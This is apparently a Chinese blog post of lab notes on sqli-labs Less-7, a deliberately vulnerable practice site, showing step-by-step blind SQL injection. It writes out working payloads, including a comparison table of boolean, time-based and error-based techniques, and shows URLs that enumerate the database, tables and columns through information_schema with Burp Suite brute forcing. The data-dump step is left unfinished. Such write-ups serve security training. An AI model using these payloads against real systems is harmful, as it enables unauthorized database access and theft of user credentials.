【撸靶笔记】第七关:GET - Dump into outfile - String

不羁。。2025-08-21 3:07

第七关

1、确定注入点

2、确定列数

3、确定回显位

也没有回显位,继续报错注入,准备写shi

4、报错注入

这里使用"报错注入"爆库名,失败,

反复检查,不是sql语句的原因,写shi失败,尝试使用盲注

5、盲注

以下是 SQL 注入中不同盲注类型的分析表格,从定义、特点、判断方式、适用场景及示例等方面进行对比:

盲注类型 定义 核心特点 判断方式 适用场景 示例(假设查询为SELECT * FROM users WHERE id = [输入]
布尔盲注 基于 SQL 语句执行后返回的布尔状态(真 / 假)推断信息,无直接错误或数据显示 仅返回两种状态(如页面正常 / 异常、存在 / 不存在提示),无具体数据或错误信息 构造条件语句(如AND 1=1AND 1=2),观察页面状态变化差异 页面无错误回显,但对条件判断有状态响应(如登录成功 / 失败、内容显示 / 隐藏) 输入1 AND SUBSTRING((SELECT username FROM users LIMIT 1),1,1)='a',若页面正常则首字母为 'a',否则不是
时间盲注 基于 SQL 语句执行后是否触发时间延迟推断信息,无任何状态或数据显示 无页面状态差异,需通过执行时间判断;依赖数据库延时函数(如SLEEP() 构造含延时函数的条件语句(如AND IF(条件,SLEEP(5),0)),观察响应时间 页面无任何状态差异(布尔盲注失效),但数据库支持延时函数 输入1 AND IF(SUBSTRING((SELECT username FROM users LIMIT 1),1,1)='a',SLEEP(5),0),若响应延迟 5 秒则首字母为 'a'
报错盲注 基于 SQL 语句执行后返回的错误信息提取数据,通过构造错误触发信息泄露 会显示数据库错误详情(如表名、列名、数据片段),需利用错误函数触发 构造含错误函数的语句(如UPDATEXML()ExtractValue()),从错误信息提取 页面开启错误显示(如调试模式),且数据库支持错误函数 输入1 AND UPDATEXML(1,CONCAT(0x7e,(SELECT username FROM users LIMIT 1),0x7e),1),错误信息可能显示用户名片段

补充说明:

  • 三种盲注的核心区别在于信息反馈方式:布尔盲注依赖状态差异,时间盲注依赖执行时间,报错盲注依赖错误信息。
  • 实际渗透中,通常先尝试报错盲注(效率最高),再试布尔盲注,最后考虑时间盲注(耗时且易被检测)。
  • 部分场景可能存在混合盲注(如同时具备布尔和时间特征),需结合多种方式验证。

根据之前的页面反馈,尝试使用布尔盲注

6、爆库名:

使用length( )方法,确认库名长度

sql 复制代码 
(length(database()))=8  --页面回显正常

http://bachang/sqli-labs-master/Less-7/?id=1%27))%20and%20(length(database()))=8--+

知道库名字段长度后,**可以使用BP抓包直接进行暴力破解,**免去一个一个手动去试

这里手动爆出库名的一个字符,作为演示

sql 复制代码 
http://bachang/sqli-labs-master/Less-7/?id=1%27))%20and%20substr((database()),1,1)%20=%27s%27%20--+

利用BP爆破,得到库名为security

7、爆表名

获取表个数:4

sql 复制代码 
?id=1')) and (select count(*) from information_schema.tables where table_schema=database())=4 --+

获取表名长度

sql 复制代码 
?id=1')) and (select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)=6 --+

借助BP爆所有表名长度:6---8---7---5

爆表名:直接爆第4个表,表名为users;爆其他表名只需更改粉色负载点的值:0--3 共4张表

?id=1')) and (substr(select table_name from information_schema.tables where table_schema=database() limit 3,1),1,1)='u' --+

8、爆字段名

爆字段长度:20

sql 复制代码 
?id=1')) and length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))=20 --+

爆字段名

sql 复制代码 
?id=1')) and (select substr(group_concat(column_name),1,1) from information_schema.columns where table_schema=database() and table_name='users')='a' --+

利用BP爆破:id---username---password

9、爆数据

查数据条数:

--?

确定每条数据长度:

--?

爆数据:

--?

相关推荐
爬山算法4 小时前
Redis(162)如何使用Redis实现消息队列?
数据库·redis·缓存
u***32434 小时前
【Redis】centos7 systemctl 启动 Redis 失败
数据库·redis·缓存
煎蛋学姐5 小时前
SSM社区生鲜电商平台dq96z(程序+源码+数据库+调试部署+开发环境)带论文文档1万字以上,文末可获取,系统界面在最后面
数据库·用户管理·ssm 框架·社区生鲜电商·商品信息管理
杨云龙UP5 小时前
从0搭建Oracle ODA NFS异地备份:从YUM源到RMAN定时任务的全流程
linux·运维·数据库·oracle
Dolphin_Home5 小时前
笔记:SpringBoot静态类调用Bean的2种方案(小白友好版)
java·spring boot·笔记
倔强的石头_5 小时前
从 Oracle 到 KingbaseES:破解迁移痛点,解锁信创时代数据库新可能
数据库
暗然而日章5 小时前
C++基础:Stanford CS106L学习笔记 4 容器(关联式容器)
c++·笔记·学习
踢足球09295 小时前
Redis的典型应用
数据库·redis·缓存
hadage2335 小时前
--- redis 常见问题 ---
数据库·redis·mybatis
O***P5715 小时前
redis批量删除namespace下的数据
数据库·redis·缓存
热门推荐
01GitHub 镜像站点02React CVE-2025-55182漏洞排查与修复指南03【超详细教程】手把手教你从微软官网免费下载Windows 10官方原版ISO镜像(2025最新版)04安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)05UV安装并设置国内源06BongoCat - 跨平台键盘猫动画工具07本地部署阿里最新开源的Z-Image08智能库存管理的需求预测模型:从业务痛点到落地代码的完整实践09Linux下V2Ray安装配置指南10在VSCode配置Java开发环境的保姆级教程(适配各类AI编程IDE)